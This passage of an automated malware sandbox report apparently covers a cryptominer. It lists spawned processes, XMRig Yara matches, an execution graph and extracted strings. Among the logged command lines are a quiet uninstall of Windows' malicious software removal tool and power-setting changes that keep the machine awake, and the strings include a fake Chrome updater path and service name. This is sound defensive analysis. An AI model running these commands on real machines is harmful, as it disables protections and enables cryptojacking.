                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:34
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:35
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:36
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:37
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:38
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\wusa.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff64bbc0000
                                                                  File size:345'088 bytes
                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:39
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:conhost.exe
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3249654814.000002862EC04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3249654814.000002862EC16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.2729862472.000002862EC1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                  Has exited:false

                                                                  Target ID:41
                                                                  Start time:09:45:40
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                  Imagebase:0x7ff7e52b0000
                                                                  File size:55'320 bytes
                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false


                                                                    Execution Graph

                                                                    Execution Coverage:2.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:13.8%
                                                                    Total number of Nodes:899
                                                                    Total number of Limit Nodes:2
2426->2427 2428 140001530 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000153f 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000154e 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000155d 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000156c 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000157b 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000158a 2439->2440 2441 140001394 2 API calls 2440->2441 2442 140001599 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015a8 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015b7 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015c6 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015d5 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015e4 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015f3 2453->2454 2454->2291 2455 14000156c 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000157b 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000158a 2458->2459 2460 140001394 2 API calls 2459->2460 2461 140001599 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015a8 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015b7 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015c6 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015d5 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015e4 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015f3 2472->2473 2473->2291 2474 14000145e 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000146d 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000147c 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000148b 2479->2480 2481 140001394 2 API calls 2480->2481 2482 14000149a 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014a9 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014b8 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014c7 2487->2488 2489 140001394 2 API calls 
2488->2489 2490 1400014d6 2489->2490 2491 1400014e5 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 1400014ef 2493->2494 2495 1400014f4 2494->2495 2496 140001394 2 API calls 2494->2496 2497 140001394 2 API calls 2495->2497 2496->2495 2498 1400014fe 2497->2498 2499 140001503 2498->2499 2500 140001394 2 API calls 2498->2500 2501 140001394 2 API calls 2499->2501 2500->2499 2502 14000150d 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001512 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001521 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001530 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000153f 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000154e 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000155d 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000156c 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000157b 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000158a 2519->2520 2521 140001394 2 API calls 2520->2521 2522 140001599 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015a8 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015b7 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015c6 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015d5 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015e4 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015f3 2533->2534 2534->2291 2536 140001394 2 API calls 2535->2536 2537 14000158a 2536->2537 2538 140001394 2 API calls 2537->2538 2539 140001599 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015a8 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015b7 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015c6 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015d5 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015e4 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400015f3 
2550->2551 2551->2369 2553 140001394 2 API calls 2552->2553 2554 1400015a8 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015b7 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015c6 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015d5 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015e4 2561->2562 2563 140001394 2 API calls 2562->2563 2564 1400015f3 2563->2564 2564->2369 2566 140001394 2 API calls 2565->2566 2567 1400015b7 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015c6 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015d5 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015e4 2572->2573 2574 140001394 2 API calls 2573->2574 2575 1400015f3 2574->2575 2575->2369 2577 140001394 2 API calls 2576->2577 2578 14000147c 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000148b 2579->2580 2581 140001394 2 API calls 2580->2581 2582 14000149a 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014a9 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014b8 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014c7 2587->2588 2589 140001394 2 API calls 2588->2589 2590 1400014d6 2589->2590 2591 1400014e5 2590->2591 2592 140001394 2 API calls 2590->2592 2593 140001394 2 API calls 2591->2593 2592->2591 2594 1400014ef 2593->2594 2595 1400014f4 2594->2595 2596 140001394 2 API calls 2594->2596 2597 140001394 2 API calls 2595->2597 2596->2595 2598 1400014fe 2597->2598 2599 140001503 2598->2599 2600 140001394 2 API calls 2598->2600 2601 140001394 2 API calls 2599->2601 2600->2599 2602 14000150d 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001512 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001521 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001530 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000153f 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000154e 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000155d 2613->2614 
2615 140001394 2 API calls 2614->2615 2616 14000156c 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000157b 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000158a 2619->2620 2621 140001394 2 API calls 2620->2621 2622 140001599 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015a8 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015b7 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015c6 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015d5 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015e4 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015f3 2633->2634 2634->2332 2635 140001530 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000153f 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000154e 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000155d 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000156c 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000157b 2644->2645 2646 140001394 2 API calls 2645->2646 2647 14000158a 2646->2647 2648 140001394 2 API calls 2647->2648 2649 140001599 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015a8 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015b7 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015c6 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015d5 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015e4 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015f3 2660->2661 2661->2337 2661->2338 2663 140001394 2 API calls 2662->2663 2664 1400014b8 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014c7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400014d6 2667->2668 2669 1400014e5 2668->2669 2670 140001394 2 API calls 2668->2670 2671 140001394 2 API calls 2669->2671 2670->2669 2672 1400014ef 2671->2672 2673 1400014f4 2672->2673 2674 140001394 2 API calls 2672->2674 2675 140001394 2 API calls 2673->2675 2674->2673 2676 1400014fe 
2675->2676 2677 140001503 2676->2677 2678 140001394 2 API calls 2676->2678 2679 140001394 2 API calls 2677->2679 2678->2677 2680 14000150d 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001512 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001521 2683->2684 2685 140001394 2 API calls 2684->2685 2686 140001530 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000153f 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000154e 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000155d 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000156c 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000157b 2695->2696 2697 140001394 2 API calls 2696->2697 2698 14000158a 2697->2698 2699 140001394 2 API calls 2698->2699 2700 140001599 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015a8 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015b7 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015c6 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015d5 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015e4 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400015f3 2711->2712 2712->2347 2713 140001440 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000144f 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000145e 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000146d 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000147c 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000148b 2722->2723 2724 140001394 2 API calls 2723->2724 2725 14000149a 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014a9 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014b8 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014c7 2730->2731 2732 140001394 2 API calls 2731->2732 2733 1400014d6 2732->2733 2734 1400014e5 2733->2734 2735 140001394 2 API calls 2733->2735 2736 140001394 2 API calls 2734->2736 2735->2734 2737 1400014ef 2736->2737 2738 
1400014f4 2737->2738 2739 140001394 2 API calls 2737->2739 2740 140001394 2 API calls 2738->2740 2739->2738 2741 1400014fe 2740->2741 2742 140001503 2741->2742 2743 140001394 2 API calls 2741->2743 2744 140001394 2 API calls 2742->2744 2743->2742 2745 14000150d 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001512 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001521 2748->2749 2750 140001394 2 API calls 2749->2750 2751 140001530 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000153f 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000154e 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000155d 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000156c 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000157b 2760->2761 2762 140001394 2 API calls 2761->2762 2763 14000158a 2762->2763 2764 140001394 2 API calls 2763->2764 2765 140001599 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015a8 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015b7 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015c6 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015d5 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015e4 2774->2775 2776 140001394 2 API calls 2775->2776 2777 1400015f3 2776->2777 2777->2347 2777->2355 2779 1400014e5 2778->2779 2780 140001394 2 API calls 2778->2780 2781 140001394 2 API calls 2779->2781 2780->2779 2782 1400014ef 2781->2782 2783 1400014f4 2782->2783 2784 140001394 2 API calls 2782->2784 2785 140001394 2 API calls 2783->2785 2784->2783 2786 1400014fe 2785->2786 2787 140001503 2786->2787 2788 140001394 2 API calls 2786->2788 2789 140001394 2 API calls 2787->2789 2788->2787 2790 14000150d 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001512 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001521 2793->2794 2795 140001394 2 API calls 2794->2795 2796 140001530 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000153f 2797->2798 2799 
140001394 2 API calls 2798->2799 2800 14000154e 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000155d 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000156c 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000157b 2805->2806 2807 140001394 2 API calls 2806->2807 2808 14000158a 2807->2808 2809 140001394 2 API calls 2808->2809 2810 140001599 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015a8 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015b7 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015c6 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015d5 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015e4 2819->2820 2821 140001394 2 API calls 2820->2821 2822 1400015f3 2821->2822 2822->2386 2824 140001394 2 API calls 2823->2824 2825 140001530 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000153f 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000154e 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000155d 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000156c 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000157b 2834->2835 2836 140001394 2 API calls 2835->2836 2837 14000158a 2836->2837 2838 140001394 2 API calls 2837->2838 2839 140001599 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015a8 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015b7 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015c6 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015d5 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015e4 2848->2849 2850 140001394 2 API calls 2849->2850 2851 1400015f3 2850->2851 2851->2386 2853 140001394 2 API calls 2852->2853 2854 140001431 2853->2854 2855 140001394 2 API calls 2854->2855 2856 140001440 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000144f 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000145e 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000146d 
2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000147c 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000148b 2865->2866 2867 140001394 2 API calls 2866->2867 2868 14000149a 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014a9 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014b8 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014c7 2873->2874 2875 140001394 2 API calls 2874->2875 2876 1400014d6 2875->2876 2877 1400014e5 2876->2877 2878 140001394 2 API calls 2876->2878 2879 140001394 2 API calls 2877->2879 2878->2877 2880 1400014ef 2879->2880 2881 1400014f4 2880->2881 2882 140001394 2 API calls 2880->2882 2883 140001394 2 API calls 2881->2883 2882->2881 2884 1400014fe 2883->2884 2885 140001503 2884->2885 2886 140001394 2 API calls 2884->2886 2887 140001394 2 API calls 2885->2887 2886->2885 2888 14000150d 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001512 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001521 2891->2892 2893 140001394 2 API calls 2892->2893 2894 140001530 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000153f 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000154e 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000155d 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000156c 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000157b 2903->2904 2905 140001394 2 API calls 2904->2905 2906 14000158a 2905->2906 2907 140001394 2 API calls 2906->2907 2908 140001599 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015a8 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015b7 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015c6 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015d5 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015e4 2917->2918 2919 140001394 2 API calls 2918->2919 2920 1400015f3 2919->2920 2920->2386 2922 140001394 2 API calls 2921->2922 2923 140001440 2922->2923 2924 140001394 2 API 
calls 2923->2924 2925 14000144f 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000145e 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000146d 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000147c 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000148b 2932->2933 2934 140001394 2 API calls 2933->2934 2935 14000149a 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014a9 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014b8 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014c7 2940->2941 2942 140001394 2 API calls 2941->2942 2943 1400014d6 2942->2943 2944 1400014e5 2943->2944 2945 140001394 2 API calls 2943->2945 2946 140001394 2 API calls 2944->2946 2945->2944 2947 1400014ef 2946->2947 2948 1400014f4 2947->2948 2949 140001394 2 API calls 2947->2949 2950 140001394 2 API calls 2948->2950 2949->2948 2951 1400014fe 2950->2951 2952 140001503 2951->2952 2953 140001394 2 API calls 2951->2953 2954 140001394 2 API calls 2952->2954 2953->2952 2955 14000150d 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001512 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001521 2958->2959 2960 140001394 2 API calls 2959->2960 2961 140001530 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000153f 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000154e 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000155d 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000156c 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000157b 2970->2971 2972 140001394 2 API calls 2971->2972 2973 14000158a 2972->2973 2974 140001394 2 API calls 2973->2974 2975 140001599 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015a8 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015b7 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015c6 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015d5 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015e4 2984->2985 
2986 140001394 2 API calls 2985->2986 2987 1400015f3 2986->2987 2987->2386

                                                                    Callgraph


                                                                    Control-flow Graph

                                                                    APIs
                                                                    • NtQueryInformationFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: FileInformationQuery
                                                                    • String ID:
                                                                    • API String ID: 365787318-0
                                                                    • Opcode ID: 36523fda6eca0ee512bde486ae1e8954491fab6c76cc6521f032f1d5cf9c1036
                                                                    • Instruction ID: c5c377e216d660e8bb6bb0cefb1630b72abf422e51d1fd79f54a2d93a1040c4d
                                                                    • Opcode Fuzzy Hash: 36523fda6eca0ee512bde486ae1e8954491fab6c76cc6521f032f1d5cf9c1036
                                                                    • Instruction Fuzzy Hash: 6AF0AFB2608B408AEA12DF62F85179A77A5F38C7C0F009919BBC853735DB3CC190CB40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$wcscatwcscpy$_wcsnicmp
                                                                    • String ID: $ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\bzoteldvymki$\BaseNamedObjects\paiwqsbipblamcnmtpdktrir$\BaseNamedObjects\vazasxarlpknfxrw$\Google\Chrome\updater.exe$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Services\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe
                                                                    • API String ID: 3506639089-941377090
                                                                    • Opcode ID: 0cda6c72a2f06585f01c0bb1b43b4488e8f849583809ff9edc4bdafd39976df0
                                                                    • Instruction ID: ef81d73e35cacb278a3ce7412ee70fca3090d70b6629413a1a3bc68791ba6f30
                                                                    • Opcode Fuzzy Hash: 0cda6c72a2f06585f01c0bb1b43b4488e8f849583809ff9edc4bdafd39976df0
                                                                    • Instruction Fuzzy Hash: 265339F1924BC198F723CB3AB8467E56360BB9D3C8F445316BB84676B2EB794285C305

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
